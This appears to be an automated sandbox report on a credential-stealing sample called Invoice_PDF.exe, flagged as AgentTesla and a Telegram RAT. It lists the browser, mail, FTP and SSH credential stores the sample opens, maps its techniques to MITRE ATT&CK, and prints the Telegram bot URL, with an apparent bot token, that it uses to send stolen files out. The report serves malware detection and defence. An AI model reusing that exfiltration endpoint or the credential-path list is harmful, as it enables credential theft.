                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Users\user\Desktop\Invoice_PDF.exe VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Stealing of Sensitive Information:

Yara detected Telegram RAT
Source: Yara match | File source: 00000003.00000002.525641259.0000000003251000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Invoice_PDF.exe PID: 6140, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: Invoice_PDF.exe PID: 5944, type: MEMORYSTR
Yara detected AgentTesla
Source: Yara match | File source: 3.0.Invoice_PDF.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.Invoice_PDF.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.0.Invoice_PDF.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Invoice_PDF.exe.4130420.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.0.Invoice_PDF.exe.400000.10.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.0.Invoice_PDF.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.0.Invoice_PDF.exe.400000.12.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Invoice_PDF.exe.4219800.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Invoice_PDF.exe.4130420.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Invoice_PDF.exe.4219800.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000003.00000000.271867261.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000000.272301229.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.519916492.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000000.272859935.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000000.273395534.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.277834680.0000000004029000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.525641259.0000000003251000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Invoice_PDF.exe PID: 6140, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: Invoice_PDF.exe PID: 5944, type: MEMORYSTR
Tries to steal Mail credentials (via file / registry access)
Source: C:\Users\user\Desktop\Invoice_PDF.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\Desktop\Invoice_PDF.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Tries to harvest and steal ftp login credentials
Source: C:\Users\user\Desktop\Invoice_PDF.exe | File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
Source: C:\Users\user\Desktop\Invoice_PDF.exe | File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\Invoice_PDF.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\Invoice_PDF.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: Yara match | File source: 00000003.00000002.525641259.0000000003251000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Invoice_PDF.exe PID: 5944, type: MEMORYSTR

                      Remote Access Functionality:

Yara detected Telegram RAT
Source: Yara match | File source: 00000003.00000002.525641259.0000000003251000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Invoice_PDF.exe PID: 6140, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: Invoice_PDF.exe PID: 5944, type: MEMORYSTR
Yara detected AgentTesla
Source: Yara match | File source: 3.0.Invoice_PDF.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.Invoice_PDF.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.0.Invoice_PDF.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Invoice_PDF.exe.4130420.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.0.Invoice_PDF.exe.400000.10.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.0.Invoice_PDF.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.0.Invoice_PDF.exe.400000.12.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Invoice_PDF.exe.4219800.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Invoice_PDF.exe.4130420.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Invoice_PDF.exe.4219800.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000003.00000000.271867261.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000000.272301229.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.519916492.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000000.272859935.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000000.273395534.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.277834680.0000000004029000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.525641259.0000000003251000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Invoice_PDF.exe PID: 6140, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: Invoice_PDF.exe PID: 5944, type: MEMORYSTR

                      Mitre Att&ck Matrix

Techniques listed per tactic column (numbers following a technique are the matrix's match counters, kept as shown):

Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
Execution: Windows Management Instrumentation 211; Scheduled Task/Job; At (Linux); At (Windows); Cron; Launchd; Scheduled Task
Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items
Privilege Escalation: Process Injection 112; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items
Defense Evasion: Masquerading 1; Disable or Modify Tools 1; Virtualization/Sandbox Evasion 131; Process Injection 112; Deobfuscate/Decode Files or Information 1; Obfuscated Files or Information 3; Software Packing 13
Credential Access: OS Credential Dumping 2; Credentials in Registry 1; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
Discovery: Query Registry 1; Security Software Discovery 211; Process Discovery 2; Virtualization/Sandbox Evasion 131; Application Window Discovery 1; Remote System Discovery 1; System Information Discovery 114
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
Collection: Email Collection 1; Archive Collected Data 11; Data from Local System 2; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Command and Control: Web Service 1; Encrypted Channel 11; Non-Application Layer Protocol 2; Application Layer Protocol 3; Fallback Channels; Multiband Communication; Commonly Used Port
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact

                      Behavior Graph

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

Source | Detection | Scanner | Label | Link
Invoice_PDF.exe | 45% | Virustotal | | Browse
Invoice_PDF.exe | 49% | Metadefender | | Browse
Invoice_PDF.exe | 62% | ReversingLabs | ByteCode-MSIL.Backdoor.Androm |
Invoice_PDF.exe | 100% | Avira | HEUR/AGEN.1141888 |

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

Source | Detection | Scanner | Label | Link | Download
3.0.Invoice_PDF.exe.400000.12.unpack | 100% | Avira | TR/Spy.Gen8 | | Download File
3.0.Invoice_PDF.exe.400000.4.unpack | 100% | Avira | TR/Spy.Gen8 | | Download File
3.0.Invoice_PDF.exe.400000.6.unpack | 100% | Avira | TR/Spy.Gen8 | | Download File
3.2.Invoice_PDF.exe.400000.0.unpack | 100% | Avira | TR/Spy.Gen8 | | Download File
3.0.Invoice_PDF.exe.400000.10.unpack | 100% | Avira | TR/Spy.Gen8 | | Download File
3.0.Invoice_PDF.exe.400000.8.unpack | 100% | Avira | TR/Spy.Gen8 | | Download File

                      Domains

                      No Antivirus matches

                      URLs

Source | Detection | Scanner | Label
http://127.0.0.1:HTTP/1.1 | 0% | Avira URL Cloud | safe
http://DynDns.comDynDNS | 0% | URL Reputation | safe
http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha | 0% | URL Reputation | safe
http://PHCGWf.com | 0% | Avira URL Cloud | safe
http://www.fontbureau.comE8 | 0% | Avira URL Cloud | safe
http://www.tiro.com | 0% | URL Reputation | safe
http://www.goodfont.co.kr | 0% | URL Reputation | safe
http://www.carterandcone.coml | 0% | URL Reputation | safe
http://www.sajatypeworks.com | 0% | URL Reputation | safe
http://www.typography.netD | 0% | URL Reputation | safe
http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
http://fontfabrik.com | 0% | URL Reputation | safe
http://www.founder.com.cn/cn | 0% | URL Reputation | safe
https://api.telegram.org4 | 0% | URL Reputation | safe
http://www.fontbureau.comoitu | 0% | URL Reputation | safe
http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
https://87HMfkdDwCo1wEm.org | 0% | Avira URL Cloud | safe
http://www.fontbureau.como | 0% | URL Reputation | safe
http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
http://www.fontbureau.comgrito | 0% | URL Reputation | safe
http://www.sandoll.co.kr | 0% | URL Reputation | safe
http://www.urwpp.deDPlease | 0% | URL Reputation | safe
http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
http://www.chinhdo.com | 0% | URL Reputation | safe
http://www.sakkal.com | 0% | URL Reputation | safe
https://87HMfkdDwCo1wEm.orgx | 0% | Avira URL Cloud | safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip | 0% | URL Reputation | safe

                      Domains and IPs

                      Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
api.telegram.org | 149.154.167.220 | true | false | | high

                        Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
https://api.telegram.org/bot1900392974:AAEB_yGGlWksNcNC4Dg08OgUSlmDON2w098/sendDocument | false | | high

                          URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://127.0.0.1:HTTP/1.1 | Invoice_PDF.exe, 00000003.00000002.525641259.0000000003251000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | low
http://www.apache.org/licenses/LICENSE-2.0 | Invoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmp | false | | high
http://www.fontbureau.com | Invoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmp | false | | high
http://www.fontbureau.com/designersG | Invoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmp | false | | high
http://DynDns.comDynDNS | Invoice_PDF.exe, 00000003.00000002.525641259.0000000003251000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/? | Invoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmp | false | | high
http://www.founder.com.cn/cn/bThe | Invoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://api.telegram.org | Invoice_PDF.exe, 00000003.00000002.527224881.00000000035A4000.00000004.00000001.sdmp | false | | high
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha | Invoice_PDF.exe, 00000003.00000002.525641259.0000000003251000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers? | Invoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmp | false | | high
https://api.telegram.org/bot1900392974:AAEB_yGGlWksNcNC4Dg08OgUSlmDON2w098/sendDocumentdocument----- | Invoice_PDF.exe, 00000003.00000002.525641259.0000000003251000.00000004.00000001.sdmp | false | | high
http://PHCGWf.com | Invoice_PDF.exe, 00000003.00000002.525641259.0000000003251000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fontbureau.comE8 | Invoice_PDF.exe, 00000000.00000002.275871817.0000000001717000.00000004.00000040.sdmp | false | Avira URL Cloud: safe | unknown
http://www.tiro.com | Invoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers | Invoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmp | false | | high
http://www.goodfont.co.kr | Invoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.carterandcone.coml | Invoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.sajatypeworks.com | Invoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.typography.netD | Invoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/cabarga.htmlN | Invoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmp | false | | high
http://www.founder.com.cn/cn/cThe | Invoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/staff/dennis.htm | Invoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://fontfabrik.com | Invoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.founder.com.cn/cn | Invoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://api.telegram.org4 | Invoice_PDF.exe, 00000003.00000002.527224881.00000000035A4000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/frere-jones.html | Invoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmp | false | | high
